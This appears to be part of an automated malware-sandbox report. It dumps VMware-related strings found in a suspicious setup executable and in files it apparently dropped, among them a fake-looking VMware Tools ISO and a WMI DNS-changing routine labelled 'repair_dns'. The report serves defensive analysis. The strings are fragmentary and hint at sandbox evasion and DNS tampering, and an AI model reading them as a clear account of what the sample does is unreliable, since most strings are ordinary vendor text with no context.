                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallHgfsDriverNT'
                    Source: winPre2k.iso.0.drBinary or memory string: name="VMware.VMware.cacheMod"
                    Source: winPre2k.iso.0.drBinary or memory string: Invalid keyName in Util_DoesKeyExistBegin LoggingUnable to log to intended file %s, error %dvminstutil.logEnd LoggingDid not find file/directory: "%s"Found "%s"Loaded library %s(%d)Failed to load library %s: %dCreate Process failed: %dNo exit code returned from async processFailed to get process exit code: %dProcess returned %dAttempting to launch "%s"Failed to allocate space for command line%s %sFile "%s" doesn't existERROR: The file copy operation failed: %uCopy '%s' to '%s'Cannot copy non-existent file: %sDeleted file %sFailed to delete %s: %dAlready removed: %sDeleting %sCould not create directory %s (%d)._Success.log_Failed.log_%02d%02d%02d_%02d%02d%02d[Error] GetDiskFreeSpace returned [Error] GetDiskFreeSpaceEx returned This kernel32.dll may not support GetDiskFreeSpaceEx.%c:\ has %I64u freeGetDiskFreeSpaceExADrive %c:\ is not a valid character.MSI reg info for %s indicates it is not nestedError getting registry key %s for value %sClientsMSI reg info for %s does not existInstaller\Products\Error munging ProductCodeError in ProductCodeChecking Nested-ness of ProductCode: %sError creating registry key %s\SourceListError setting registry key %s for value %sRemoving Nested-ness of ProductCode: %sError in ProductCode/parentProductCodeNesting ProductCode: %s with parent %sABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=No Expire7.7.0VMware Toolsrbwb
                    Source: wm.exe.0.drBinary or memory string: 1998-2020 VMware, Inc.>
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareTrayIcon
                    Source: winPre2k.iso.0.drBinary or memory string: VMware software
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Failed to launch 64 bit hgfs driver installer.
                    Source: wm.exe.0.drBinary or memory string: Local\VMware Workstation Initialization Mutex
                    Source: winPre2k.iso.0.drBinary or memory string: s vmmouse.sysNTja
                    Source: winPre2k.iso.0.drBinary or memory string: 2) Double-cliquez sur "VMware Tools.msi" dans la racine de l'image du CD VMware Tools. Il s'agit g
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareToolsUpgrader.exe
                    Source: wm.exe.0.drBinary or memory string: %sInvalid URL: %sbora\apps\vmuiWin32\vmui.cpp15.0+VMware Workstation15.5.7 build-17171714%s %s
                    Source: winPre2k.iso.0.drBinary or memory string: 5) Select VMware SVGA II as the display adapter and click OK.
                    Source: wm.exe.0.drBinary or memory string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdbxx9t
                    Source: wm.exe.0.drBinary or memory string: ?Supported@vmnetcfg@util@wui@@YA_NXZ
                    Source: winPre2k.iso.0.drBinary or memory string: 1) Wenn das Installationsprogramm von VMware Tools Sie zum Neustart auffordert, w
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLib.lib_win32
                    Source: wm.exe.0.drBinary or memory string: VSMDBValForceRemoveNoRemoveDeleteVMware.Workstation.vmuiAdvapi32.dllRegOpenKeyTransactedWRegCreateKeyTransactedWRegDeleteKeyTransactedWF
                    Source: winPre2k.iso.0.drBinary or memory string: Instructions for installing the VMware Tools in a Windows NT guest
                    Source: winPre2k.iso.0.drBinary or memory string: pertoire "msi" de l'image du CD VMware Tools. Il s'agit g
                    Source: winPre2k.iso.0.drBinary or memory string: vmscsi
                    Source: wm.exe.0.drBinary or memory string: ImageUtil_PremultiplyAlphavmwarebase.DLLH
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: installHgfs "%s"
                    Source: winPre2k.iso.0.drBinary or memory string: in the root of the VMware Tools CD image. This will usually be
                    Source: winPre2k.iso.0.drBinary or memory string: gD:\VMware Tools.mis
                    Source: winPre2k.iso.0.drBinary or memory string: AD:\VMware Tools.msi
                    Source: wm.exe.0.drBinary or memory string: vmware-vmx:
                    Source: winPre2k.iso.0.drBinary or memory string: [VMToolsUpgrader]: %s
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s VMGuestLibInterface.html
                    Source: winPre2k.iso.0.drBinary or memory string: 7.7.0Error creating dictionary for tools manifest file.wFailed to allocate buffer for tools manifest file path.manifest.txtFailed to create common app data directory.Failed to get common app data directory path.VMWARETOOLS_CMNAPPDATAUpdating tools manifest version file.Failed to install video driver: %dFailed to adjust resolutionSuccessfully installed video driverWin95 guest requires manual video driver installInstalling the Win9x video driverFailed to install 64 bit hgfs driver.Failed to launch 64 bit hgfs driver installer.installHgfs "%s"Failed to find 64 bit hgfs driver install helper.Installing 64 bit hgfs driverInstalling the WinNT hgfs driverHost not NT or aboveSkipping vmxnet-nic driver install on a 64 bit platformHW version is %i: Won't install VMware NIC driverVMXNet_NICPCI\VEN_1022&DEV_2000&SUBSYS_20001022Can't find vmxnet NIC driver inf filevmware-nic.infHW version is %i: Installing VMware NIC driverPCI\VEN_15AD&DEV_0720&SUBSYS_00000000PCI\VEN_15AD&DEV_0720&SUBSYS_072015ADCan't find vmxnet driver inf filevmxnet.infoemsetup.infInstalling the Win2k vmxnet driverRpcOut: couldn't open channel with RPCI protocol
                    Source: winPre2k.iso.0.drBinary or memory string: %c%c:inst : %m/%d/%y %H:%M:%S 7.7.0VMware Tools%s:%d Buffer too small 0x%x
                    Source: winPre2k.iso.0.drBinary or memory string: Failed to build driver listSetupDiCallClassInstaller failed: %dSetupDiSetSelectedDriverA failed: %dSetupDiEnumDriverInfoA: Found VMware driverSetupDiSetSelectedDriverW failed: %dSetupDiEnumDriverInfoW: Found VMware driverCouldn't select correct driverVMwareGetOsVersionEx failed: %dSetupDiBuildDriverInfoList failed: %dSetupDiSetDeviceInstallParams failed: %dUnable to install the driver: %dUnable to register the device installer: %dUnable to set the hardware ID: %dUnable to create device object: 0x%08xFailed to reinstall the existing driver: 0x%08xSuccessfully reinstalled the existing driverDevice instance already existsUnable to get the device list: %dInstalling root driver. Device: %s, HID: %s, inf: %stoolsNTSetupDiEnumDeviceInfo failed: %dSetupDiRemoveDevice succeededSetupDiRemoveDevice failed: 0x%08xSetupDiGetClassDevs failed: 0x%08xNo more devices to enumerateUninstallVMXNetDriver returned %dFound %d GUIDs for %s class driverSetupDiClassGuidsFromName failed: 0x%08xAttempting to remove %s class driverUnknown devClass: %sVersionProviderNetAttempting to remove %s class driver files%s uninstall needs a rebootThe token does not have the specified privilege.
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machines cannot be run in the background. You can power them off now.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: %s\hgfs1.dll
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareUser9x.exe6
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareService.exeNT
                    Source: winPre2k.iso.0.drBinary or memory string: VMware SVGA II
                    Source: wm.exe.0.drBinary or memory string: ?Initialize@vmnetcfg@util@wui@@YAXXZ
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machine cannot be run in the background. You can choose to suspend it for later use or power it off now.
                    Source: winPre2k.iso.0.drBinary or memory string: terminer sur quel produit VMware est ex
                    Source: winPre2k.iso.0.drBinary or memory string: 0$VMware Toolso0
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareToolsUpgrader9x.exe
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgraderNT.exePX$
                    Source: winPre2k.iso.0.drBinary or memory string: HW version is %i: Won't install VMware NIC driver
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machines cannot be run in the background. You can choose to suspend them for later use or power them off now.@&!*@*@(msg.vmuiApp.closeCurrentSession.vmsPoweredOnNoSuspend)Some virtual machines are still powered on.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: HgfsServerGetOpenFlags: Invalid HgfsOpenFlags
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareXferlogs.exe
                    Source: wm.exe.0.drBinary or memory string: ?GetVMNetworkList@vmnetcfg@util@wui@@YAABV?$vector@UVMNetInfo@vmnetcfg@util@wui@@V?$allocator@UVMNetInfo@vmnetcfg@util@wui@@@std@@@std@@XZ
                    Source: wm.exe.0.drBinary or memory string: ?GetAlive@VM@cui@@QBE_NXZvmwarecui.dll
                    Source: winPre2k.iso.0.drBinary or memory string: [VMToolsUpgrader]: %sVMware Tools Upgrader: Failed to format error message
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Unable to initialize HGFS server.
                    Source: wm.exe.0.drBinary or memory string: vmwarecui.dll
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: toolbox/windows/hgfslib/hgfsServerWin32.c
                    Source: winPre2k.iso.0.drBinary or memory string: FileDescriptionVMware Tools UpgraderH
                    Source: winPre2k.iso.0.drBinary or memory string: The VMware Tools Upgrader application must be run in a Virtual Machine.
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools SetupOptions:
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.runError)Unable to run the VMware support script. Contact VMware customer support for further assistance.CVMUICollectSupportData::InvokeHostVMSupport%s: Failed to get system folder: 0x%08X
                    Source: winPre2k.iso.0.drBinary or memory string: cuter cette machine virtuelle sur plusieurs produits VMware.CompTextInstalle les fonctionnalit
                    Source: winPre2k.iso.0.drBinary or memory string: AgreeToLicenseJe n'accepte pas les termes &du contrat de licenceJ'&accepte les termes du contrat de licenceVMwareToolsServiceService VMware ToolsFournit une aide pour la synchronisation d'objets entre les syst
                    Source: wm.exe.0.drBinary or memory string: Image = "XUI_HOMEPAGE_VMWARE"
                    Source: winPre2k.iso.0.drBinary or memory string: Cette version de produit VMware est trop ancienne. Vous ne pouvez pas installer cette version de VMware Tools dans cette machine virtuelle.
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.infNTja
                    Source: winPre2k.iso.0.drBinary or memory string: VMware
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s VMGuestLibHandle.html
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareUser.exe
                    Source: wm.exe.0.drBinary or memory string: VMware, Inc.1!0
                    Source: winPre2k.iso.0.drBinary or memory string: 1) Si le programme d'installation de VMware Tools vous invite
                    Source: winPre2k.iso.0.drBinary or memory string: @[Error] Failed to create helper UI.enableHelperUI:[HelperUI]: Received unknown progress message[HelperUI]: Ignoring tick count adjustment[HelperUI]: Received progress set step message[HelperUI]: Received negative tick count[HelperUI]: received progress reset message[[HelperUI]: MessageType: %Xh Message: %s[HelperUI]: Received message from wrong context: %s[HelperUI]: Received no context with the message.[Resource] lpName = %s NOT FOUND[Resource] lpName = %s, lpBuf = %sSystem\CurrentControlSet\Control\ProductOptionsProductSuiteTerminal Server_MSISETUP_{29569BA1-9B5A-4699-8698-3571369A69CA}Global\_MSISETUP_{29569BA1-9B5A-4699-8698-3571369A69CA}CheckTokenMembershipadvapi32.dllSeShutdownPrivilegeAdjustTokenPrivilegesLookupPrivilegeValueAOpenProcessToken%s%s\%sSOFTWARE\VMware, Inc.CoreSOFTWARE\VMware, Inc.\VMware ToolsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\ProductsSOFTWARE\Classes\Installer\ProductsSOFTWARE\Classes\Installer\FeaturesInstaller\ProductsInstaller\Features[Error] Failed to munge product code %s%d
                    Source: winPre2k.iso.0.drBinary or memory string: Invalid keyName in Util_IsKeyEmptyFailed to open key %sBegin LoggingUnable to log to intended file %s, error %dvminstutil.logvminst.logEnd LoggingFailure reallocating memory.Failure allocating memoryError reading already existing value %dComponentsSOFTWARE\VMware, Inc.Empty string detectedNull parameter detected.Returning InstallPath=%sAttaching to window with title "%s"Failed to get window text: %dFailed to find installer windowMsiDialogCloseClassWndDid not find file/directory: "%s"Found "%s"Not a directory: %d - %sLoaded library %s(%d)Failed to load library %s: %dInvalid keyName in DeleteKey
                    Source: winPre2k.iso.0.drBinary or memory string: es uniquement par ce produit VMware. S
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMGuestLibErrorException.html
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002025000.00000004.00000020.00020000.00000000.sdmp, setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\NeedReboot
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareTrackCursorTrayIcon
                    Source: winPre2k.iso.0.drBinary or memory string: AVMware Tools.msi
                    Source: winPre2k.iso.0.drBinary or memory string: 1) Run InstMsi.exe in the "msi" directory of the VMware Tools CD
                    Source: wm.exe.0.drBinary or memory string: ?ShowVmnetcfg@vmnetcfg@util@wui@@YAXXZC
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.dll
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareService.exeNT
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibTest.c
                    Source: winPre2k.iso.0.drBinary or memory string: Instructions pour l'installation de VMware Tools sur un client Windows NT avec un Service Pack version 6 ou inf
                    Source: wm.exe.0.drBinary or memory string: buffy@&!*@*@(msg.vmui.library.notPoweredOn)Unable to connect to this virtual machine because it is not powered on. To power on the virtual machine, login to the VMware vCloud Air at: http://www.vmware.com/go/vcloud_login@&!*@*@(msg.vmui.library.removePromptFmt)Remove "%s" from the library?
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools
                    Source: wm.exe.0.drBinary or memory string: vmwarebase.DLL
                    Source: winPre2k.iso.0.drBinary or memory string: Diese Version des VMware-Produkts ist zu alt. Sie k
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: [Info] Patch is a MINPATCH (small or minor update patch). Using default command line '%s'[Error] Failed to get system directory: %d[WARNING] Unable to return to the previous working directory[Info] Returned to [%s][WARNING] Unable to change current path[Info] Uninstall reboot required[Error] Failed to uninstall product (%d)[Info] Uninstall reboot initiated[Info] CWD = [%s][Info] Properties passed to msiexec is %s[Error] Failed to delete run once value %dvmreboot.tmp[Info] Uninstalled %s[Info] Uninstall successful[Error] Can't re-nest installer[Info] User cancelled uninstall[Info] Uninstalling with props: %s[Error] Can't un-nest installer[Error] Failed to create uninstallation UI[Error] Failed to set run once key %d[Error] Failed to open run once key %d[Info] Reinstall command is: %s%s /i "%s" %s /i REBOOT=ReallySuppress NO_UNINSTALL_MEMCTL=1 NO_UNINSTALL_VMDESCHED=1 NO_UNINSTALL_VMXNET=1 NO_UNINSTALL_SVGA=1 NO_UNINSTALL_SYNC=1 NO_UNINSTALL_MOUSE=1 NO_UNINSTALL_HGFS=1 NO_UNINSTALL_BUSLOGIC=1 VM_UPGRADE_UNINSTALL=1 [Error] Can't get name of installed product %s\msiexec.exe[Info] MSI logging to "%s"[Error] Failed to enable MSI logging: %d[Error] Failed to get temp path name for MSI log: %d [Info] Unable to process product code. Will treat as first time install[Info] The product code '%s' is known[Info] The product code '%s' is unknown. Use first time install logic.[Info] The product ver is the same. Using first time install logic.[Warning] Msi product code %s doesn't match resource version %sProductVersionProductCode and szCommandLine = %s{null}[Info] Calling MsiInstallProduct with szInstallPath = %s[Info] Setting Internal UI level[Error] Failed to initialize msi API[Error] Operation %s is not valid for a package[Error] Operation %s is not valid for a patchCannot get short temp path for VC8 dll installer.Launching VC8 dll installer failed with %d.Cannot install VC8 dlls as non-admin.vcredist_x64.exevm_vc8SP1.log ARPSYSTEMCOMPONENT=1" /C:"msiexec -i vcredist.msi -qn -leom+ /Qvcredist_x86.exe[Info] Windows Installer is already correct version[Info] Upgrade of Windows Installer is requested[Info] Windows Installer has been upgraded[Info] Upgrade of Windows Installer is requested[Info] Running setup files from "%s"\[Info] User cancelled bootstrapper.[Error] The SFX file size is incorrect[Error] Failed to extract SFX files: %d[Info] Install cancelled by the user[Error] Failed to create extract directory "%s" (%d)[Error] Failed to delete extract directory "%s"[Error] Failed to create extract directory "%s": %d[Error] Failed to get temp path name: %d[Info] FreeBytes: %I64d Needed Bytes: %I64d[Info] Extracting setup files to "%s"%s%s~setup\[Info] Total unpacked size will be %u%s%sTRANSFORMS=:TRANSFORMS=%s.mst[Info] User chose to cancel clean operation[Error] Unable to create UI Thread Error = 0x%x[Info] UI thread started successfully[Error] User doesn't have required admin privileges[Error] Another instance of setup is already running[Error] This OS is n
                    Source: winPre2k.iso.0.drBinary or memory string: 2) When installing on an English VM, double click "VMware Tools.msi"
                    Source: winPre2k.iso.0.drBinary or memory string: VMware, Inc.1>0<
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Uninstalling 64 bit hgfs driver
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.L
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi"
                    Source: winPre2k.iso.0.drBinary or memory string: ndig{&MSSansBold8}&BenutzerdefiniertAgreeToLicenseIch akzeptiere die Bedingungen der Lizenzvereinbarung &nichtIch &akzeptiere die Bedingungen der LizenzvereinbarungVMwareToolsServiceVMware Tools-DienstBietet Unterst
                    Source: wm.exe.0.drBinary or memory string: vmware.SnapshotGrid
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: glicht Anwendungen auf diesem Gast, auf Informationen zu Status und Leistung der virtuellen Maschinen zuzugreifen.HgfsOrdnerfreigabenErm
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.B
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: ZBOS_RebootrebootOS_HalthaltOS_SuspendsuspendOS_ResumeresumeOS_PowerOnpoweronUpgraderTcloCapReg: Failed to register HGFS server capability.
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.dialog.loginVca.caption)Enter your VMware vCloud Air credentials.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: BHgfs
                    Source: winPre2k.iso.0.drBinary or memory string: jVMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: ProductNameVMware ToolsL
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibJava.jar
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: System\CurrentControlSet\Services\hgfs\networkprovider
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Product Installation
                    Source: winPre2k.iso.0.drBinary or memory string: 1998-2014 VMware, Inc.<
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARETO.EXE;1RR
                    Source: wm.exe.0.drBinary or memory string: XUI_HOMEPAGE_VMWARE
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgrader9x.exe
                    Source: wm.exe.0.drBinary or memory string: QXUI_HOMEPAGE_NEWVM@&!*@*@(msg.vmui.statusHome.newVMAction.title)Create a New Virtual MachineXUI_HOMEPAGE_OPENVM@&!*@*@(msg.vmui.statusHome.openVMAction.title)Open a Virtual MachineXUI_HOMEPAGE_CONNECT@&!*@*@(msg.vmui.statusHome.connectAction.title)Connect to a Remote Server@&!*@*@(msg.vmui.statusHome.connectAction.desc)View and manage virtual machines on a remote server.XUI_HOMEPAGE_CONNECT_VCA@&!*@*@(msg.vmui.statusHome.connectVCAAction.title)Connect to VMware vCloud Air@&!*@*@(msg.vmui.statusHome.connectVCAAction.desc)View and manage virtual machines on VMware vCloud Air.XUI_HOMETABVBUTTONHomeTabVButton.xuiXUI_HOMETABHBUTTONHomeTabHButton.xuiTitleTrialPeriodInfoTrialPeriodInfoIconTrialPeriodSummaryTrialPeriodButtonsXUI_HOMEPAGE_ATTENTIONXUI_HOMEPAGE_FEEDBACKXUI_HOMETABHomeTab.xuiTitlePictureXUI_HOMEPAGE_TITLEBackgroundXUI_HOMEPAGE_BGLogoPictureXUI_HOMEPAGE_VMWAREMainButtonGridBody
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\%s
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.toolsServiceState)VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: {3C49C4A4-7456-4C6A-8100-9134D915C1C9}vm_support.vbs{18DCC119-F229-4C61-A45F-5106B0BD7232}zip.exe{9E271638-C517-47E3-95E9-457227DE4A2C}ALLCLA~1.HTM|allclasses-frame.htmlALLCLA~2.HTM|allclasses-noframe.htmlCONSTA~1.HTM|constant-values.htmlGUESTS~1.PDF|GuestSDK_Terms_and_Conditions.pdfHELP-D~1.HTM|help-doc.htmlINCLUD~1.H|includeCheck.hINDEX~1.HTM|index.htmlINDEX-~1.HTM|index-all.htmlOVERVI~1.HTM|overview-summary.htmlOVERVI~2.HTM|overview-tree.htmlPACKAG~1.HTM|package-frame.htmlPACKAG~1|package-listPACKAG~2.HTM|package-summary.htmlPACKAG~3.HTM|package-tree.htmlSERIAL~1.HTM|serialized-form.htmlSTYLES~1.CSS|stylesheet.cssVM_BAS~1.H|vm_basic_types.h10337.7.0.1450VMGUES~1.DLL|vmGuestLib.dllVMGUES~1.H|vmGuestLib.hVMGUES~1.LIB|vmGuestLib.libVMGUES~1.HTM|VMGuestLibErrorException.htmlVMGUES~2.HTM|VMGuestLibHandle.htmlVMGUES~3.HTM|VMGuestLibInterface.htmlVMGUESTJ.DLL|vmGuestLibJava.dllVMGUES~1.JAR|vmGuestLibJava.jarVMGUES~2.LIB|vmGuestLibJava.libVMGUES~1.C|vmGuestLibTest.cVMSESS~1.H|vmSessionId.h7.2.2.0hgfs.sys7.2.4.0vmmemctl.sysVM-SUP~1.VBS|vm-support.vbsvmmouse.inf12.4.0.2vmmouse.sys4.0.0.95011.6.0.4vmx_fb.dllvmx_mode.dllvmx_svga.infvmx_svga.sys2.0.1.7vmxnet.sys6.8.4.05.0.2195.1vmxfrlog.exe|VMwareXferlogs.exe4.71.1460.1COMCAT.3207D1B0_80E5_11D2_B95D_006097C4DE24Redist.3207D1B0_80E5_11D2_B95D_006097C4DE24.:Redist.:MSMS.3207D1B0_80E5_11D2_B95D_006097C4DE24System.3207D1B0_80E5_11D2_B95D_006097C4DE24comcat.dllGlobal_Controls_COMCATDLL.3207D1B0_80E5_11D2_B95D_006097C4DE24Global_Controls_COMCATDLL_f0.3207D1B0_80E5_11D2_B95D_006097C4DE24BothThreadingModelCLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32Global_Controls_COMCATDLL_r0.3207D1B0_80E5_11D2_B95D_006097C4DE24+Component CategoriesGlobal_Controls_COMCATDLL_r1.3207D1B0_80E5_11D2_B95D_006097C4DE24Embeddable Objects409Component Categories\{40FC6ED3-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r2.3207D1B0_80E5_11D2_B95D_006097C4DE24ControlsComponent Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r3.3207D1B0_80E5_11D2_B95D_006097C4DE24Automation ObjectsComponent Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r4.3207D1B0_80E5_11D2_B95D_006097C4DE24Document ObjectsComponent Categories\{40FC6ED8-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r5.3207D1B0_80E5_11D2_B95D_006097C4DE24_Printable ObjectsComponent Categories\{40FC6ED9-2438-11CF-A3DB-080036F12502}Global_Controls_COMCATDLL_r6.3207D1B0_80E5_11D2_B95D_006097C4DE24Component Categories ManagerInprocServer32{0002E005-0000-0000-C000-000000000046}{3207
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusVM.vmNetWorksUnavailable)Network information is not available
                    Source: common.dll.0.drBinary or memory string: WQLSELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUEroot\cimv2Win32_NetworkAdapterConfigurationSetDNSServerSearchOrderDNSServerSearchOrderIndexCaptionvmwarevirtualWin32_NetworkAdapterConfiguration.Index=%d[repair_dns] success.
                    Source: wm.exe.0.drBinary or memory string: #HPVMListReg::DeleteInstance: Timed out.Software\VMware, Inc.\Running VM List.Default\wui::util::VMListReg::CreateRegistryEventwui::util::VMListReg::CreateShutdownEventVMListReg::Register - Invalid key.
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools Upgrader: Failed to format error message
                    Source: winPre2k.iso.0.drBinary or memory string: VMware, Inc.
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARE_T.MSI;1RR
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLib.dll
                    Source: wm.exe.0.drBinary or memory string: vmware.exe
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareService.exe
                    Source: winPre2k.iso.0.drBinary or memory string: Win32 VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: 8) Select the "VMware SVGA II" display adapter and click
                    Source: wm.exe.0.drBinary or memory string: vmwarestring.dll
                    Source: winPre2k.iso.0.drBinary or memory string: C:\Program Files\VMware
                    Source: winPre2k.iso.0.drBinary or memory string: @STATICVMware, Inc.
                    Source: winPre2k.iso.0.drBinary or memory string: name="VMware.VMware.toolsinstutil"
                    Source: wm.exe.0.drBinary or memory string: ProductNameVMware WorkstationP
                    Source: wm.exe.0.drBinary or memory string: OriginalFilenamevmware.exeF
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.dll
                    Source: winPre2k.iso.0.drBinary or memory string: t du service VMwareVM_Stop9xService_SetDataVM_StopTrayArr
                    Source: winPre2k.iso.0.drBinary or memory string: suspend-vm-default.batresume-vm-default.batpoweroff-vm-default.batpoweron-vm-default.batinstall %d "%s" "%s" %dinstutil64.exeInstalling 64-bit PnP device: %sVMMEMCTL%s\Drivers\%svmmemctl.sysFailed to get system directory: %dUninstalling the WinNT memctl driverUnknown VM type: %dVMX is Express (WS)VMX is ESX (ESX)ESXVMX is Server (GSX)GSXVMX is ACE (WS)VMX is Workstation (WS)VM_TYPEWSInside a VMERROR: Not inside a VM. Exiting...UILevelChecking requirementsINSTALLME.txtINSTALL98.txtINSTALL95.txtShutdown9x.exetoolsuninst.dlluninstutil.dllVMTUninst.isuFailed to remove ARP key: %sRemoving legacy uninstall key from HKLM\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMware Tools\VMware Toolbox.lnkVMControlPanel.cplhook.dllVMwareUser.exeVMip.exe-uVMwareService.exe-killDnDManager.exeVMwareTray.exeTelling existing tray app to quitVMTBox.exeKilling old tools tray processFound old tools tray windowVMwareTrackCursorTrayIcon\C:\Program Files\VMwareFailed to get the old installation pathSOFTWARE\VMware, Inc.\VMware ToolsInstallPathCustomActionDataCleaning out legacy Tools filesFailed to clean-up registry settings for earlier per-user tools installation{B53D42E8-872B-430E-82D4-80065A31FCE1}{BA0EA5A0-F474-459F-ABF5-5BCC22965199}Invalid arguments for uninstalling legacy per-user tools installation;Cleaning out Tools files for legacy per-user installationsReboot not requiredSOFTWARE\VMware, Inc.\NeedRebootVMREBOOT1Reboot requiredChecking for rebootSOFTWARE\VMware, Inc.\VMware Tools\UninstallFilesDeleting extra filesStop9XServiceStopping the 9x serviceStopUserProcessOS not 9X, NT, or vistaStopping the user processLaunching the tray appLaunching the user app-iLaunching the Win9x service\CPelevated.dllRegistering the control panelUnregistering the control panelFailed to move source %s destination %s error %dFailed to create directory%s\%s%s%stools.confCan't find installation directoryCan't find tools config migration directoryMinor upgrade - migrating the tools conf settings<INSTALLDIR>Patching the default batch filesStarting %s installation: %sStarting %s uninstallation: %sReleasebuild-1463223unknown UI levelfull UIreduced UIbasic UIsilentInstalled##############################################################Finishing %s installation: %sFinishing %s uninstallation: %sSilentLOGEND_TYPEDESTINATION_PATHInstall95.txtInstall98.txtInstallME.txtInstallNT.txtinstall.txtSetting up manual video driver install instructionsFailed to patch source path bat file%s is set to run at rebootSoftware\Microsoft\Windows\CurrentVersion\RunOnceRestoreSourcePath#REGFILE#SourcePathregedit.exe/s /e "%s" HKEY_LOCAL_MACHINE\%sSoftware\Microsoft\Windows\CurrentVersion\SetupModifying SourcePath to %sSkipping source path modification%s\SourcePath.bat%s\SourcePath.regSUPPORTDIRDRIVER_VIDEOHacking source pathMANUAL_MOUSE_INSTALLFailed to install mouse driver: %dSuccessfully installed mouse driverCan't find video driver inf filevmmouse.infWin95 guest requires manual mouse driver installInstall
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.jar
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s!vmGuestLib.h|
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgrader9x.exePX$
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machine cannot be run in the background. You can power it off now.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VM_MigrateLegacySettings_SetDataVM_WriteHgfsRegistry
                    Source: winPre2k.iso.0.drBinary or memory string: \VMware
